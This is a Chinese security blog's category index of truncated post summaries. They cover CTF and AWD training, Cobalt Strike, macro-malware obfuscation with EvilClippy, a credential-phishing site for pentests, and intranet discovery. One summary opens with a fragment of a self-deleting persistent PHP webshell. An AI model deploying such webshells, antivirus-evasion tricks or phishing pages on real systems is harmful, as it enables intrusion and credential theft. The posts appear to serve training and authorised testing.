随笔分类 -  网络安全

网络安全为人民。网络安全靠人民
摘要:大二的暑假让师傅们帮忙内推一下暑期实习,简历被丢到腾讯简历池里面被捞起来一次,但是那个时候大三刚开学,想着还是多学点技术,沉淀自己的想法婉拒了腾讯面试官。昨天简历又被捞了起来,虽然已经决定大三下好好学习考个研究生成为村里的唯一一个研究生(滑稽 主要还是想看看腾讯面试的水平,前一天在网上搜了一下应用运 阅读全文 »
posted @ 2020-11-13 12:16 春告鳥 阅读(1723) 评论(0) 推荐(4) 编辑
摘要:啊,阿Sir,免费的还想白嫖?? 好啦好啦不开玩笑 Xray是从长亭洞鉴核心引擎中提取出的社区版漏洞扫描神器,支持主动、被动多种扫描方式,自备盲打平台、可以灵活定义 POC,功能丰富,调用简单,支持 Windows / macOS / Linux 多种操作系统,可以满足广大安全从业者的自动化 Web 阅读全文 »
posted @ 2020-10-27 12:51 春告鳥 阅读(24398) 评论(2) 推荐(1) 编辑
摘要:关于Redis Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从201 阅读全文 »
posted @ 2020-10-25 19:31 春告鳥 阅读(2552) 评论(0) 推荐(1) 编辑
摘要:使用github开源工具EvilClippy进行宏病毒混淆免杀:https://github.com/outflanknl/EvilClippy/releases 注意需要将这两个文件下载在同一个文件夹下,不要只下载EvilClippy.exe而忘记下载OpenMcdf.dll: 关于evilCli 阅读全文 »
posted @ 2020-10-19 01:02 春告鳥 阅读(3822) 评论(9) 推荐(1) 编辑
摘要:关于WORD宏: 在百度百科上有: 宏是一个批量处理程序命令,正确地运用它可以提高工作效率。微软的office软件允许用户自己编写,叫VBA的脚本来增加其灵活性,进一步扩充它的能力。如完打开word文件同时要打开某个文件的功能,必须要自己编写一段称之为宏的脚本。具体做法是在“工具”菜单“宏”-“宏” 阅读全文 »
posted @ 2020-10-16 01:07 春告鳥 阅读(5871) 评论(0) 推荐(0) 编辑
摘要:答:为什么要写这个代码? 当然不是做黑产去盗别人扣扣,也没有啥查看别人隐私信息的癖好,搭建该站点的适用对象为->使用社会工程学定向钓鱼攻击的安全渗透人员 另外管理员界面后端写的很丑+很烂,除了我自身的技术原因外,另一个原因就是为了防止被盗号贩子给批量利用(生活艰难早日收手 简单介绍一下这个项目趴: 阅读全文 »
posted @ 2020-10-14 23:44 春告鳥 阅读(5055) 评论(0) 推荐(1) 编辑
摘要:内网存活主机探测是内网渗透测试中不可或缺的一个环节,可在白天和晚上分别进行探测,以对比分析存活主机和对应的IP地址 1,利用ICMP协议快速探测内网 ICMP协议全称为 Internet Control Message Protocol (Internet控制报文协议) 依次对内网中的每个IP地址执 阅读全文 »
posted @ 2020-10-12 14:50 春告鳥 阅读(7834) 评论(0) 推荐(0) 编辑
摘要:给实验室同学搭建的CTFD平台用于内部训练和CTF的校赛,为了循序渐进当然是先内部出一些简单入门的题目,但是网上大部分关于CTFD平台的都只是部署,而关于题目放置的内容却很少,虽然这个过程比较简单,但还是记录一下 部署自制题目一共分为以下几步(以WEB题目为例,实际上如果是逆向,杂项,密码学这些不需 阅读全文 »
posted @ 2020-10-08 23:47 春告鳥 阅读(5541) 评论(0) 推荐(2) 编辑
摘要:关于部署:https://www.cnblogs.com/Cl0ud/p/13688649.html PS:好菜,后来发现内网主机还是PING不通VM1,索性三台主机全部配成NAT模式,按照WEB靶机(VM1)->内网渗透域成员主机(VM2)->拿下域管(VM3)的步骤进行渗透 访问VM1:http 阅读全文 »
posted @ 2020-10-05 14:43 春告鳥 阅读(3043) 评论(0) 推荐(0) 编辑
摘要:在某场比赛中师傅们说需要用到该工具,学习之 题目给了我们一个流量包,分析 发现 .hint.php.swp文件 该文件是使用 vim 编辑文件时异常退出而产生的,可以通过 vim -r 文件名 进行相应的恢复,但在这里我们直接跟踪流向下看 存在提示: You need to get two pass 阅读全文 »
posted @ 2020-10-02 17:00 春告鳥 阅读(1798) 评论(0) 推荐(0) 编辑
摘要:CobaltStrike3.14&3.8安装&中文乱码解决 工具简介 Cobalt Strike 一款以 Metasploit 为基础的 GUI 框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell 木马生成等。钓鱼攻击包括:站点克隆,目标信息获取, 阅读全文 »
posted @ 2020-09-22 01:57 春告鳥 阅读(4928) 评论(2) 推荐(0) 编辑
摘要:靶场描述: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有 阅读全文 »
posted @ 2020-09-18 00:27 春告鳥 阅读(4652) 评论(1) 推荐(0) 编辑
摘要:开学后实验室来了几个新同学,在线上CTF方面大家一直在持续学习,但AWD模式的CTF我们练习并不多,所以准备搭建一个AWD平台用于实验室成员的线下赛攻防练习。 最开始的是防灾科技大学的线下AWD靶场: https://github.com/glzjin/20190511_awd_docker 但是靶 阅读全文 »
posted @ 2020-09-13 20:14 春告鳥 阅读(3369) 评论(0) 推荐(1) 编辑
摘要:一个简单的不死马如: <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325 阅读全文 »
posted @ 2020-09-06 02:51 春告鳥 阅读(6583) 评论(3) 推荐(1) 编辑
摘要:AWD比赛防止没有网络,在移动硬盘里面准备一个乌云漏洞库。 之前也想过弄一个乌云的镜像网站,无奈学生机性能太低下了,部署到公网上服务器存储空间都不够,只能部署在本地硬盘了。 乌云镜像的开源地址:https://github.com/m0l1ce/wooyunallbugs 文件的百度网盘下载链接:h 阅读全文 »
posted @ 2020-09-05 13:38 春告鳥 阅读(1910) 评论(0) 推荐(1) 编辑
摘要:CTF SHOW平台的WEB AK赛: 签到_观己 <?php ​ if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ die('error'); }else{ include($file 阅读全文 »
posted @ 2020-08-23 14:02 春告鳥 阅读(721) 评论(0) 推荐(0) 编辑
摘要:CVE的全称是"Common Vulnerabilities and Exposures"翻译成中文就是"公共漏洞和披露" 可以简单理解跟国内CNVD的通用漏洞证书差不多,不过CVE是分配给你一个全球唯一的CVE_ID 网上申请CVE的教程都是从github开源CMS上入手,本篇也不能免俗,如果你已 阅读全文 »
posted @ 2020-08-18 08:34 春告鳥 阅读(5720) 评论(2) 推荐(1) 编辑
摘要:16-20关 第十六关 关键代码为: <?php ini_set("display_errors", 0); $str = strtolower($_GET["keyword"]); $str2=str_replace("script"," ",$str); $str3=str_replace(" 阅读全文 »
posted @ 2020-08-16 17:44 春告鳥 阅读(258) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示